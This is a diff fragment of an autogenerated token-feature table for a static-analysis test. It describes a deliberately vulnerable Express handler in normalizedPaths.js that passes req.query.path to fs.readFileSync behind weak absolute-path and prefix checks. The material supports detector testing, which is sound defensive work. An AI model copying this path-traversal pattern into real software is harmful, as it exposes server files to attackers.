app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:81:28:81:30 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path = ... ry.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path = ... ry.path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path = ... ry.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:7:82:27 | path = ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:16 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:16 | req | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:16 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:22 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:22 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:22 | req.query | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:22 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:22 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:27 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:27 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:27 | req.query.path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:27 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:14:82:27 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:18:82:22 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:18:82:22 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:18:82:22 | query | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:18:82:22 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:18:82:22 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:82:24:82:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:82:24:82:27 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:82:24:82:27 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:82:24:82:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:82:24:82:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:84:7:84:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:84:7:84:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:84:7:84:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:84:7:84:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:84:7:84:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:17 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:28 | pathMod ... bsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:84:8:84:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:84:19:84:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:84:19:84:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:84:19:84:28 | isAbsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:84:19:84:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:84:19:84:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:5 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:5 | res | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:5 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:11 | res.write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:11 | res.write | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:11 | res.write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:11 | res.write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | exceptional return of res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | res.wri ... (path)) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:3:87:34 | res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:7:87:11 | write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:7:87:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:7:87:11 | write | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:7:87:11 | write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:7:87:11 | write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:14 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:14 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:14 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:14 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:27 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:27 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:27 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:27 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -7905,6 +71589,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:87:13:87:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/normalizedPaths.js:87:16:87:27 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:87:16:87:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:87:16:87:27 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:87:16:87:27 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:87:16:87:27 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:87:29:87:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:87:29:87:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:87:29:87:32 | path | calleeImports | fs | @@ -7914,6 +71603,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:87:29:87:32 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:87:29:87:32 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:87:29:87:32 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:21 | path.startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | exceptional return of path.st ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | exceptional return of path.st ... r/www') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | exceptional return of path.st ... r/www') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | exceptional return of path.st ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | exceptional return of path.st ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | path.st ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | path.st ... r/www') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | path.st ... r/www') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | path.st ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:89:7:89:39 | path.st ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:89:12:89:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:89:12:89:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:89:12:89:21 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:89:12:89:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:89:12:89:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:89:23:89:38 | '/home/user/www' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:89:23:89:38 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:89:23:89:38 | '/home/user/www' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -7922,6 +71636,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:89:23:89:38 | '/home/user/www' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:89:23:89:38 | '/home/user/www' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:89:23:89:38 | '/home/user/www' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:7 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:7 | res | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:7 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:13 | res.write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:13 | res.write | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:13 | res.write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:13 | res.write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | exceptional return of res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | exceptional return of res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | res.wri ... (path)) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:5:90:36 | res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:9:90:13 | write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:9:90:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:9:90:13 | write | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:9:90:13 | write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:9:90:13 | write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:16 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:16 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:16 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:16 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:29 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:29 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:29 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:29 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -7930,6 +71684,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:90:15:90:35 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/normalizedPaths.js:90:18:90:29 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| 